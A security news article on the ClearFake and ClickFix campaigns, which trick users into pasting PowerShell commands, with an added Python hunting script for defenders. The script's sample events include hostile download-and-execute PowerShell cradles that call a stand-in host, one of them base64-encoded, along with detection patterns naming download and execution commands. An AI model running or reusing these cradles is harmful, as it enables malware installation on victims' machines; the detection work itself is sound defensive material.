
Scamming Tactics: Importing Malware onto Unsuspecting Victims


Threat actors have been using fake browser updates and fake software error messages to trick users into copying a PowerShell command and pasting it into their own machines, infecting themselves with malware that includes remote access Trojans (RATs) and information stealers. Researchers at Proofpoint observed the technique over the past three months and attribute part of the activity to the initial access broker TA571 and the rest to an as-yet unidentified actor. The campaigns began as early as March 1 and are detailed in a Proofpoint blog post published on June 17.

Two social-engineering lures are in use. The ClearFake campaign offers a fake browser update; the second, which the researchers call "ClickFix", shows fake error messages attributed to popular software such as Word, Google Chrome, and OneDrive. Payloads seen in these campaigns include the DarkGate and NetSupport RATs, the Matanbuchus loader, and information stealers such as Lumma and Vidar.

Overall, the researchers see cybercriminals adopting increasingly creative attack chains that rely on nested PowerShell scripts and other tricks the user is unlikely to notice. The security-relevant point is that the victim runs the command by hand: no software vulnerability is exploited and no attachment executes automatically, so controls aimed at those paths do not fire. The "clever" and "authoritative" wording of the fake error messages pushes the user to act immediately without weighing the risk.

In ClearFake, compromised websites are injected with JavaScript that fetches its next stage from smart contracts on Binance's Smart Chain, a hosting trick known as EtherHiding. The injected page tells the visitor that a "root certificate" must be installed to view the site correctly and supplies a PowerShell script to run; the script instead delivers malware such as the Lumma stealer, the Amadey loader, and JaskaGo.

In ClickFix, the user is shown a fake error message claiming a browser update failed and is offered a "fix": copy a PowerShell command and run it, which ends with the Vidar stealer being installed. The payload domain for this campaign went offline shortly after it was discovered, but the researchers noted that a related ClearFake injection remained active.
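The common thread in both lures is that the victim launches PowerShell by hand, so the child process appears with explorer.exe (the host of the Run dialog) as its parent and a command line that downloads and executes a second stage. The following Python hunting snippet is an added example and is not part of Proofpoint's report or the original article. It scores constructed process-creation events (fields modelled on Sysmon Event ID 1) on that pattern and peels nested -EncodedCommand layers so an inner download cradle becomes visible. The sample events, indicator weights and threshold are illustrative assumptions, not values from the campaigns.

```python
import base64
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 fields.
# They are made up for this example; they are not telemetry from the campaigns.
INNER_CRADLE = "iex (irm https://example.invalid/payload.ps1 -UseBasicParsing)"
ENCODED_CRADLE = base64.b64encode(INNER_CRADLE.encode("utf-16-le")).decode("ascii")
BENIGN_ENCODED = base64.b64encode("Get-Date".encode("utf-16-le")).decode("ascii")
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    # ClickFix/ClearFake style: pasted into the Run dialog, so explorer.exe is the parent
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": 'powershell -w hidden -nop -ep bypass -c "iex (iwr https://example.invalid/fix.ps1).Content"'},
    # Same lure, but the download cradle is wrapped in -EncodedCommand
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": f"powershell -nop -w hidden -enc {ENCODED_CRADLE}"},
    # Benign: an admin runs a local script from a console window
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_EXE,
     "CommandLine": r"powershell -File C:\Scripts\Get-DiskReport.ps1"},
    # Benign: a scheduled task uses -EncodedCommand without any network fetch
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS_EXE,
     "CommandLine": f"powershell -enc {BENIGN_ENCODED}"},
]

# (name, weight, pattern). Weights are illustrative; tune them on your own baseline.
INDICATORS = [
    ("download_cradle", 3, re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|"
        r"Net\.WebClient|Start-BitsTransfer|curl|wget)\b", re.I)),
    ("dynamic_exec", 2, re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
    ("hidden_window", 1, re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("policy_bypass", 1, re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I)),
    ("no_profile", 1, re.compile(r"-nop(?:rofile)?\b", re.I)),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
# -ep and -ex are ExecutionPolicy prefixes and are deliberately not matched here.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.I)

THRESHOLD = 5  # assumed alerting threshold for this example


def decode_layers(cmdline, max_depth=4):
    """Peel nested -EncodedCommand layers. Returns [outer, inner1, inner2, ...]."""
    layers = [cmdline]
    current = cmdline
    for _ in range(max_depth):
        match = ENC_FLAG.search(current)
        if not match:
            break
        try:
            # -EncodedCommand is base64 over UTF-16LE text
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            break
        layers.append(decoded)
        current = decoded
    return layers


def analyze_event(event):
    """Score one process-creation event; returns score, indicator names and decoded layers."""
    layers = decode_layers(event["CommandLine"])
    # Replace the base64 blob before pattern matching so random base64 cannot trip a keyword.
    text = "\n".join(ENC_FLAG.sub(" -EncodedCommand <base64>", layer) for layer in layers)
    hits, score = [], 0
    for name, weight, pattern in INDICATORS:
        if pattern.search(text):
            hits.append(name)
            score += weight
    if len(layers) > 1:
        hits.append("encoded_command")
        score += 1
    # The Run dialog is hosted by explorer.exe, so a command pasted from a web lure
    # shows explorer.exe as parent; scheduled tasks and batch scripts do not.
    if event["ParentImage"].lower().endswith("\\explorer.exe"):
        hits.append("explorer_parent")
        score += 2
    return {"score": score, "indicators": hits, "layers": layers}


def hunt(events, threshold=THRESHOLD):
    """Return the events whose score reaches the threshold, with their analysis attached."""
    flagged = []
    for event in events:
        result = analyze_event(event)
        if result["score"] >= threshold:
            flagged.append({"CommandLine": event["CommandLine"], **result})
    return flagged


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["score"], hit["indicators"])
        for depth, layer in enumerate(hit["layers"]):
            print(f"  layer {depth}: {layer}")
```

The two lure-style events score 10 each and are flagged; the console-launched script and the scheduled task's encoded Get-Date stay below the threshold. In production, feed the same logic real Sysmon or Security 4688 events and also record the RunMRU registry values, which retain what the user pasted into the Run dialog even after the process exits.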

TA571, the initial access broker behind part of this activity, has used similar attack chains since March 1 in email campaigns against thousands of organizations worldwide. Its messages carry malicious attachments that present the same kind of deceptive error message and instruct the recipient to run a command, with Matanbuchus or DarkGate as the resulting payload.

To help defenders, Proofpoint has published indicators of compromise (IoCs) for these campaigns. The researchers stress that user awareness is the primary defense here, because the attack only succeeds if the victim runs the command: employees should be taught that no legitimate update or error dialog asks them to paste commands into a terminal or the Run dialog, and that such prompts should be reported to the security team. Folding this specific scenario into existing awareness training, and pairing it with monitoring for user-launched PowerShell, improves an organization's posture against the technique.
